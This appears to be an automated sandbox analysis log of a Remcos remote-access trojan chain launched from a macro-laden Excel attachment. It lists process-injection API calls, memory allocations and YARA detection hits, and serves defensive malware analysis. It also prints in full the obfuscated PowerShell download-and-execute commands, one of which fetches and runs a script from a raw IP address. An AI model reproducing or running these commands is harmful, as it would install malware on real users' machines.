                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,17_2_0041812A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,17_2_0041330D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,17_2_0041BBC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,17_2_0041BB9A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00401806 NtdllDefWindowProc_W,21_2_00401806
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004018C0 NtdllDefWindowProc_W,21_2_004018C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004016FD NtdllDefWindowProc_A,23_2_004016FD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004017B7 NtdllDefWindowProc_A,23_2_004017B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00402CAC NtdllDefWindowProc_A,26_2_00402CAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00402D66 NtdllDefWindowProc_A,26_2_00402D66
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_004167EF
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE8998352E7_2_000007FE8998352E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE898856B014_2_000007FE898856B0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE8995340914_2_000007FE89953409
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE8995133E14_2_000007FE8995133E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043706A17_2_0043706A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041400517_2_00414005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043E11C17_2_0043E11C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004541D917_2_004541D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004381E817_2_004381E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041F18B17_2_0041F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044627017_2_00446270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043E34B17_2_0043E34B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004533AB17_2_004533AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0042742E17_2_0042742E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043756617_2_00437566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043E5A817_2_0043E5A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004387F017_2_004387F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043797E17_2_0043797E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004339D717_2_004339D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044DA4917_2_0044DA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00427AD717_2_00427AD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041DBF317_2_0041DBF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00427C4017_2_00427C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00437DB317_2_00437DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00435EEB17_2_00435EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043DEED17_2_0043DEED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00426E9F17_2_00426E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_1001719417_2_10017194
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_1000B5C117_2_1000B5C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B04021_2_0044B040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043610D21_2_0043610D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044731021_2_00447310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044A49021_2_0044A490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040755A21_2_0040755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043C56021_2_0043C560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B61021_2_0044B610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044D6C021_2_0044D6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004476F021_2_004476F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044B87021_2_0044B870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044081D21_2_0044081D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041495721_2_00414957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004079EE21_2_004079EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00407AEB21_2_00407AEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044AA8021_2_0044AA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00412AA921_2_00412AA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404B7421_2_00404B74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404B0321_2_00404B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044BBD821_2_0044BBD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404BE521_2_00404BE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404C7621_2_00404C76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00415CFE21_2_00415CFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00416D7221_2_00416D72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00446D3021_2_00446D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00446D8B21_2_00446D8B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00406E8F21_2_00406E8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0040503823_2_00405038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0041208C23_2_0041208C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004050A923_2_004050A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0040511A23_2_0040511A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0043C13A23_2_0043C13A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004051AB23_2_004051AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044930023_2_00449300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0040D32223_2_0040D322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044A4F023_2_0044A4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0043A5AB23_2_0043A5AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0041363123_2_00413631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044669023_2_00446690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044A73023_2_0044A730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004398D823_2_004398D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004498E023_2_004498E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044A88623_2_0044A886
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0043DA0923_2_0043DA09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00438D5E23_2_00438D5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00449ED023_2_00449ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0041FE8323_2_0041FE83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00430F5423_2_00430F54
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004050C226_2_004050C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004014AB26_2_004014AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040513326_2_00405133
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004051A426_2_004051A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040124626_2_00401246
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040CA4626_2_0040CA46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040523526_2_00405235
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004032C826_2_004032C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040168926_2_00401689
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00402F6026_2_00402F60
                Source: RFQ_0230909024SEPT.xla.xlsxOLE indicator, VBA macros: true
                Source: RFQ_0230909024SEPT.xla.xlsxStream path 'MBD000E0292/\x1Ole' : https://zeep.ly/yDfvh>$k0q3CQ,I@Ghhw\k<7YS,Css*12I|-eQ~(SUsqf=@*,V`&3Vm5B4z?:1gg7:?x}wgsf$nlC2Nu]]vmHG2hG(3C.Jv?vgvwsq4zd3tpSp8XO{^ O7?E~8il
                Source: B3930000.0.drStream path 'MBD000E0292/\x1Ole' : https://zeep.ly/yDfvh>$k0q3CQ,I@Ghhw\k<7YS,Css*12I|-eQ~(SUsqf=@*,V`&3Vm5B4z?:1gg7:?x}wgsf$nlC2Nu]]vmHG2hG(3C.Jv?vgvwsq4zd3tpSp8XO{^ O7?E~8il
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
